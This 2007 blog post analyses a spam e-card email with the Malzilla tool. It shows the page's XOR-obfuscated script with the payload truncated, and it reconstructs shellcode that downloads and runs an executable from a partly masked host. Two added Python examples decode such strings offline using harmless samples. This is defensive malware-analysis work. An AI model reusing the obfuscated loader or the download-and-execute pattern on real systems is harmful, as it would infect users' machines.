Copenhagen, Helsinki, Porvoo, Lappeenranta, Tampere… my beautiful vacation has ended. Back home again with some mails/forums/newspapers/blogs to read. My hotmail mailbox contains some unwanted mails, more than in the past. I gave it a look. From all the mails I chose one entitled “animated e-card” because there are some blogs talking about this kind of mail. They all explain what’s behind this simple e-card mail; in this post I’m going to write almost the same thing, showing you how to find the hidden code using an interesting tool named Malzilla, written by Boban Spasic. It’s a nice tool, easy to use. The examples posted on Malzilla’s web page are really helpful.
Let’s start, the mail’s body is:
“Good day.
Your Friend has sent you animated e-card from greet2k.com.
Click on your animated e-card link below:
http://68.80.xxx.32/
Copyright (c) 1991-2007 greet2k.com All Rights Reserved“
There should be something at that address. To check it I used Malzilla. Put the address in the URL box and hit the GET button. Here is what I got:
“Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/ecard.exe">click here</a> to launch the download.
<Script Language='JavaScript'>
function xor_str(plain_str, xor_key) {
    var xored_str = "";
    for (var i = 0; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}
var plain_str = "\xe5\xc8\xcf\xc8<<<many chars here>>>\x88\x89\xfb\xe5";
var xored_str = xor_str(plain_str, 197);
document.write(xored_str);
</script>“
The result is composed of two parts: a text which is displayed in the browser and a script. The text contains a link to a recent malware recognized by almost all the antivirus companies. If you click on the link you’ll download a malicious file… it’s always the same story, but many users continue to click on this kind of link, weird.
The other part is the script. It’s not really readable in this form. First of all, as suggested in Malzilla’s help page, I sent the script to the decoder using the ‘Send script to decoder’ button. In the Decode tab there is a button named “Format text”; it can be used to format the script, but it doesn’t produce a perfect indentation btw. Anyway, “Run script” reveals an interesting result:
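Running the script inside Malzilla is one way to see what the XOR hides; the other is to decode the string statically, which never executes any of the page’s JavaScript. The following is an added example, not code from the post or from Malzilla: it parses a JS string body made of \xNN escapes, XORs it with a single-byte key the way xor_str() does, and brute-forces the key when the page does not hand it to you (197 here). The obfuscated sample is constructed from harmless HTML and encoded with the same scheme; it is not the real payload.

```python
"""Static decoding of the xor_str() style obfuscation, without running the JavaScript.

Added example (not from the post or from Malzilla). The sample string below is
constructed for illustration; it is not the real payload from the e-card page.
"""
import re
import string

# Keywords an analyst expects in decoded HTML/JS; used only to rank candidate keys.
KEYWORDS = (b"<", b">", b"src=", b"http", b"script", b"embed", b"unescape")


def js_escaped_to_bytes(literal: str) -> bytes:
    """Turn a JS string body such as '\\xe5\\xc8abc' into raw bytes.
    Handles \\xNN escapes; any other character is taken literally (Latin-1)."""
    out = bytearray()
    i = 0
    while i < len(literal):
        m = re.match(r"\\x([0-9a-fA-F]{2})", literal[i:])
        if m:
            out.append(int(m.group(1), 16))
            i += 4
        else:
            out.append(ord(literal[i]) & 0xFF)
            i += 1
    return bytes(out)


def xor_decode(literal: str, key: int) -> str:
    """Equivalent of xor_str(plain_str, key): XOR every byte with the single-byte key."""
    return bytes(b ^ key for b in js_escaped_to_bytes(literal)).decode("latin-1")


def score_plaintext(data: bytes) -> int:
    """Higher is more HTML/JS-like: rewards printable text, penalises control bytes,
    and gives a bonus for markup keywords surviving the decode."""
    score = 0
    for b in data:
        if chr(b) in string.ascii_letters + string.digits + " ":
            score += 2
        elif 32 <= b < 127 or b in (9, 10, 13):
            score += 1
        else:
            score -= 5
    lower = data.lower()
    score += 20 * sum(1 for kw in KEYWORDS if kw in lower)
    return score


def guess_key(literal: str) -> int:
    """Brute-force the single-byte XOR key: try all 256 and keep the best-scoring one."""
    raw = js_escaped_to_bytes(literal)
    return max(range(256), key=lambda k: score_plaintext(bytes(b ^ k for b in raw)))


def js_escape(plain: str, key: int) -> str:
    """Re-create the obfuscated form (used here only to build the constructed sample)."""
    return "".join("\\x%02x" % (ord(c) ^ key) for c in plain)


# Constructed sample: harmless HTML, encoded the same way the page's script encodes its payload.
SAMPLE_PLAINTEXT = '<embed src="9.wmv" width="0" height="0"></embed>'
SAMPLE_KEY = 197
SAMPLE_OBFUSCATED = js_escape(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print("obfuscated:", SAMPLE_OBFUSCATED[:40], "...")
    print("guessed key:", guess_key(SAMPLE_OBFUSCATED))
    print("decoded:", xor_decode(SAMPLE_OBFUSCATED, SAMPLE_KEY))
```

The key-guessing step matters more than it looks: a single-byte XOR with any key close to the real one still yields mostly printable text, so ranking on printability alone ties; the keyword bonus is what separates the right key from its neighbours.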

I cut some bytes from the result, replacing them with ‘…’.
Ok, what’s that? Hm, look at the end of the embed src text: “9.wmv”; wmv stands for Windows Media Video. Looks like an exploit. A quick search on the internet provides the answer to the “what’s that” question: this is an exploit for a vulnerability in the Windows Media Player plug-in. In this case the shellcode (the %xx sequence inside the ‘s+=unescape’ string) contains some code able to download a file. Here is a picture taken from Malzilla which shows part of the shellcode’s bytes:

It’s easy to recognize some strings in it: urlmon.dll, C:\U.exe and the http address. The hidden code is something like:
LoadLibrary("urlmon.dll");
URLDownloadToFileA(..., "http://68.80.xxx.32/file.php", "C:\U.exe", ..., ...);
WinExec("C:\U.exe", ...);
ExitProcess(...);
The shellcode is used to download and execute a file. Once the malicious file has been executed, the shellcode ends and you are infected.
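The strings are what gave the shellcode away, and the same triage can be done offline by decoding the unescape() string to bytes and pulling out anything printable. The following is an added example, not code from the post or from Malzilla: it reverses JavaScript’s %XX and %uXXXX encoding (a %u unit becomes two little-endian bytes, the order a UTF-16 code unit takes in memory), extracts printable runs the way strings(1) would, and sorts them into libraries, API names, URLs and file paths. The blob it works on is constructed: filler bytes around the kind of strings the post recognised, with a documentation-range address (192.0.2.10) standing in for the masked one; it contains no executable code.

```python
"""Triage of an unescape()-encoded shellcode string: decode it to bytes and pull out
the strings (library names, API names, URLs, file paths) that reveal what it does.

Added example (not from the post or from Malzilla). The sample below is a constructed
byte blob made of filler plus the kind of strings the post recognised; it contains no
executable code and the address is a documentation-range placeholder.
"""
import re

# Names worth flagging when they appear in a decoded blob (those the post identified,
# plus GetProcAddress and kernel32.dll, which such loaders commonly resolve).
KNOWN_APIS = ("loadlibrary", "urldownloadtofile", "winexec", "exitprocess", "getprocaddress")
KNOWN_LIBS = ("urlmon.dll", "kernel32.dll")


def unescape_to_bytes(s: str) -> bytes:
    """Reverse JavaScript unescape(): %XX -> one byte, %uXXXX -> two bytes little-endian
    (the order a UTF-16 code unit takes in memory). Other characters pass through."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith("%u", i) and re.fullmatch(r"[0-9a-fA-F]{4}", s[i + 2:i + 6]):
            unit = int(s[i + 2:i + 6], 16)
            out += unit.to_bytes(2, "little")
            i += 6
        elif s[i] == "%" and re.fullmatch(r"[0-9a-fA-F]{2}", s[i + 1:i + 3]):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(ord(s[i]) & 0xFF)
            i += 1
    return bytes(out)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(data: bytes) -> dict:
    """Group recovered strings into the indicators an analyst reports."""
    found = {"libraries": [], "apis": [], "urls": [], "paths": [], "other": []}
    for s in extract_strings(data):
        low = s.lower()
        if any(lib in low for lib in KNOWN_LIBS):
            found["libraries"].append(s)
        elif any(api in low for api in KNOWN_APIS):
            found["apis"].append(s)
        elif re.search(r"https?://", low):
            found["urls"].append(s)
        elif re.match(r"[a-z]:\\", low):
            found["paths"].append(s)
        else:
            found["other"].append(s)
    return found


def to_unescape_form(data: bytes) -> str:
    """Encode bytes as %XX the way the page's script carries them (used only to build the sample)."""
    return "".join("%%%02X" % b for b in data)


# Constructed sample blob: filler bytes around the strings the post recognised in the real
# shellcode. 192.0.2.10 is a documentation-range placeholder, not the post's masked address.
SAMPLE_BLOB = (
    b"\x00" * 8
    + b"urlmon.dll\x00"
    + b"URLDownloadToFileA\x00"
    + b"http://192.0.2.10/file.php\x00"
    + b"C:\\U.exe\x00"
    + b"WinExec\x00"
    + b"ExitProcess\x00"
)
SAMPLE_ENCODED = to_unescape_form(SAMPLE_BLOB)

if __name__ == "__main__":
    decoded = unescape_to_bytes(SAMPLE_ENCODED)
    for category, items in triage(decoded).items():
        if items:
            print("%-10s %s" % (category, ", ".join(items)))
```

The output of triage() is exactly the list the post reconstructs by eye from the Malzilla hex view: the library, the download API, the URL the file is fetched from, the path it is written to, and the calls that run it and exit.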
Don’t know if this file and the ecard.exe are the same; I’m not interested in it now. I just wanted to give Malzilla a try, an interesting tool for sure. Thanks to Boban.
That’s all!
August 28, 2007 at 7:50 pm
Great post man! ;)